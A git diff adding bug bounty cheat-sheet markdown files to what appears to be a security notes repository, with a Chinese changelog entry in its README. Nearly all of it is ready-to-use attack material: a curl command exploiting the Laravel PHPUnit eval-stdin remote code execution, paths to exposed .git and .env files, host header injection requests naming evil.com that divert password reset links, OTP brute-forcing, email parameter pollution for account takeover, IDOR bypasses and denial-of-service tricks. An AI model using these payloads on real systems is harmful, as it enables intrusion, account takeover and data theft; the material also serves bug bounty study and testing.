+1. Sometimes in website we found a parameter that can adjust the size of the image, for example
+```
+https://target.com/img/vulnerable.jpg?width=500&height=500
+```
+Try change "500" to "99999999999"
+```
+https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999
+```
+
+References: [Hackerone #751904](https://hackerone.com/reports/751904)
+
+2. Try changing the value of the header with something new, for example:
+```
+Accept-Encoding: gzip, gzip, deflate, br, br
+```
+
+References: [Hackerone #861170](https://hackerone.com/reports/861170)
+
+3. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests
+
+References: [Hackerone #892615](https://hackerone.com/reports/892615)
diff --git a/BugBounty/AllAboutBugBounty/Exposed Source Code.md b/BugBounty/AllAboutBugBounty/Exposed Source Code.md
new file mode 100644
index 0000000..8656c4d
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Exposed Source Code.md	
@@ -0,0 +1,25 @@
+# Exposed Source Code
+
+1. Exposed Git folder
+```
+https://site.com/.git
+```
+![GIT folder](https://1.bp.blogspot.com/-wTZOuULaqNw/XliI9jS0w3I/AAAAAAAAATA/VZxs7VL5PCY8FdnoKaEjS6AWpcjoJz4MgCLcBGAsYHQ/s1600/1.png)
+
+2. Exposed Subversion folder
+```
+https://site.com/.svn
+```
+![SVN folder](https://1.bp.blogspot.com/-5bC_EhFShgk/XliJqiw8pJI/AAAAAAAAATI/2HhrX0Ea3MwQ60Ax2tzNprNvulggPrZAACLcBGAsYHQ/s1600/1.png)
+
+3. Exposed Mercurial folder
+```
+https://site.com/.hg
+```
+![HG folder](https://1.bp.blogspot.com/-4FaqUeTlv4k/XliKHBOpgmI/AAAAAAAAATQ/sLdwhvSF-Jgn0WF5P-PouLp6uTeHUAOWACLcBGAsYHQ/s1600/1.png)
+
+4. Exposed Bazaar folder
+```
+http://target.com/.bzr
+```
+![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png)
\ No newline at end of file
diff --git a/BugBounty/AllAboutBugBounty/Framework/Zend.MD b/BugBounty/AllAboutBugBounty/Framework/Zend.MD
new file mode 100644
index 0000000..de269b7
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Framework/Zend.MD
@@ -0,0 +1,3 @@
+# Common bug in laravel framework
+1. Exposed config files
+* Full Path Exploit : http://target.com//application/configs/application.ini
diff --git a/BugBounty/AllAboutBugBounty/Framework/laravel.md b/BugBounty/AllAboutBugBounty/Framework/laravel.md
new file mode 100644
index 0000000..e4161d0
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Framework/laravel.md
@@ -0,0 +1,26 @@
+# Common bug in laravel framework
+1. Laravel PHPUnit Remote Code Execution
+* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+* Affected versions : Before 4.8.28 and 5.x before 5.6.3
+
+Command
+```
+curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+```
+
+2. Exposed environment variables 
+* Full Path Exploit : http://target.com/.env
+
+![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png)
+
+3. Exposed log files
+* Full Path Exploit : http://target.com/storage/logs/laravel.log
+
+4. Laravel Debug Mode Enabled
+* Using SQL injection query in GET or POST method
+* Try path /logout (ex:target.com/logout)
+* Using [] in paramater (ex:target.com/param[]=0)
+
+![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png)
+
+Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)
diff --git a/BugBounty/AllAboutBugBounty/Host Header Injection.md b/BugBounty/AllAboutBugBounty/Host Header Injection.md
new file mode 100644
index 0000000..50c8d83
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Host Header Injection.md	
@@ -0,0 +1,45 @@
+# Host Header Injection
+
+1. Change the host header
+```
+GET /index.php HTTP/1.1
+Host: evil-website.com
+...
+```
+2. Duplicating the host header
+```
+GET /index.php HTTP/1.1
+Host: vulnerable-website.com
+Host: evil-website.com
+...
+```
+3. Add line wrapping
+```
+GET /index.php HTTP/1.1
+ Host: vulnerable-website.com
+Host: evil-website.com
+...
+```
+4. Add host override headers
+```
+X-Forwarded-For : evil-website.com
+X-Forwarded-Host : evil-website.com
+X-Client-IP : evil-website.com
+X-Remote-IP : evil-website.com
+X-Remote-Addr : evil-website.com
+X-Host : evil-website.com
+```
+How to use? In this case im using "X-Forwarded-For : evil.com"
+```
+GET /index.php HTTP/1.1
+Host: vulnerable-website.com
+X-Forwarded-For : evil-website.com
+...
+```
+5. Supply an absolute URL
+```
+GET https://vulnerable-website.com/ HTTP/1.1
+Host: evil-website.com
+...
+```
+Source: https://portswigger.net/web-security/host-header/exploiting
diff --git a/BugBounty/AllAboutBugBounty/Insecure Direct Object References.md b/BugBounty/AllAboutBugBounty/Insecure Direct Object References.md
new file mode 100644
index 0000000..436294d
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Insecure Direct Object References.md	
@@ -0,0 +1,112 @@
+## IDOR (Insecure Direct Object Reference)
+
+Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
+
+1. Add parameters onto the endpoints for example, if there was
+```html
+GET /api/v1/getuser
+[...]
+```
+Try this to bypass
+```html
+GET /api/v1/getuser?id=1234
+[...]
+```
+
+2. HTTP Parameter pollution
+
+```html
+POST /api/get_profile
+[...]
+user_id=hacker_id&user_id=victim_id
+```
+
+3. Add .json to the endpoint
+
+```html
+GET /v2/GetData/1234
+[...]
+```
+Try this to bypass
+```html
+GET /v2/GetData/1234.json
+[...]
+```
+
+4. Test on outdated API Versions
+
+```html
+POST /v2/GetData
+[...]
+id=123
+```
+Try this to bypass
+```html
+POST /v1/GetData
+[...]
+id=123
+```
+
+5. Wrap the ID with an array.
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":111}
+```
+Try this to bypass
+```html
+POST /api/get_profile
+[...]
+{"id":[111]}
+```
+
+6. Wrap the ID with a JSON object
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":111}
+```
+Try this to bypass
+```html
+POST /api/get_profile
+[...]
+{"user_id":{"user_id":111}}
+```
+
+7. JSON Parameter Pollution
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":"hacker_id","user_id":"victim_id"}
+```
+
+8. Try decode the ID, if the ID encoded using md5,base64,etc
+```html
+GET /GetUser/dmljdGltQG1haWwuY29t
+[...]
+```
+dmljdGltQG1haWwuY29t => victim@mail.com
+
+9. If the website using graphql, try to find IDOR using graphql!
+```html
+GET /graphql
+[...]
+```
+```html
+GET /graphql.php?query=
+[...]
+```
+
+10. MFLAC (Missing Function Level Access Control)
+```
+GET /admin/profile
+```
+Try this to bypass
+```
+GET /ADMIN/profile
+```
+
+Source: [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup!
diff --git a/BugBounty/AllAboutBugBounty/Password Reset Flaws.md b/BugBounty/AllAboutBugBounty/Password Reset Flaws.md
new file mode 100644
index 0000000..4cbdd16
--- /dev/null
+++ b/BugBounty/AllAboutBugBounty/Password Reset Flaws.md	
@@ -0,0 +1,88 @@
+## Password Reset Flaws
+
+1. Parameter pollution in reset password
+```
+POST /reset
+[...]
+email=victim@mail.com&email=hacker@mail.com
+```
+
+2. Bruteforce the OTP code
+```
+POST /reset
+[...]
+email=victim@mail.com&code=$123456$
+```
+
+3. Host header Injection
+```
+POST /reset
+Host: evil.com
+[...]
+email=victim@mail.com
+```
+```
+POST /reset
+Host: target.com
+X-Forwarded-Host: evil.com
+[...]
+email=victim@mail.com
+```
+And the victim will receive the reset link with evil.com
+
+4. Using separator in value of the parameter
+```
+POST /reset
+[...]
+email=victim@mail.com,hacker@mail.com
+```
+```
+POST /reset
+[...]
+email=victim@mail.com%20hacker@mail.com
+```
+```
+POST /reset
+[...]
+email=victim@mail.com|hacker@mail.com
+```
+```
+POST /reset
+[...]
+email=victim@mail.com%00hacker@mail.com
+```
+
+5. No domain in value of the paramter
+```
+POST /reset
+[...]
+email=victim
+```
+
+6. No TLD in value of the parameter
+```
+POST /reset
+[...]
+email=victim@mail
+```
+
+7. Using carbon copy
+```
+POST /reset
+[...]
+email=victim@mail.com%0a%0dcc:hacker@mail.com
+```
+
+8. If there is JSON data in body requests, add comma
+```
+POST /newaccount
+[...]
+{“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”}
+```
+
+9. Find out how the tokens generate
+- Generated based on TimeStamp
+- Generated based on the ID of the user
+- Generated based on the email of the user
+- Generated based on the name of the user
+> [For Example](https://medium.com/bugbountywriteup/how-i-discovered-an-interesting-account-takeover-flaw-18a7fb1e5359)
\ No newline at end of file
diff --git a/README.md b/README.md
index 807a781..dd6dc33 100644
--- a/README.md
+++ b/README.md
@@ -12,6 +12,10 @@
 
 ## 更新记录
 
+**2021.01.31**
+
+1. 增加AllAboutBugBounty项目的文档
+
 **2021.01.27**
 
 1. 增加几个可能导致RCE的端口
@@ -332,3 +336,5 @@
 * [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)
 
 * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
+
+* [https://github.com/daffainfo/AllAboutBugBounty](https://github.com/daffainfo/AllAboutBugBounty)
\ No newline at end of file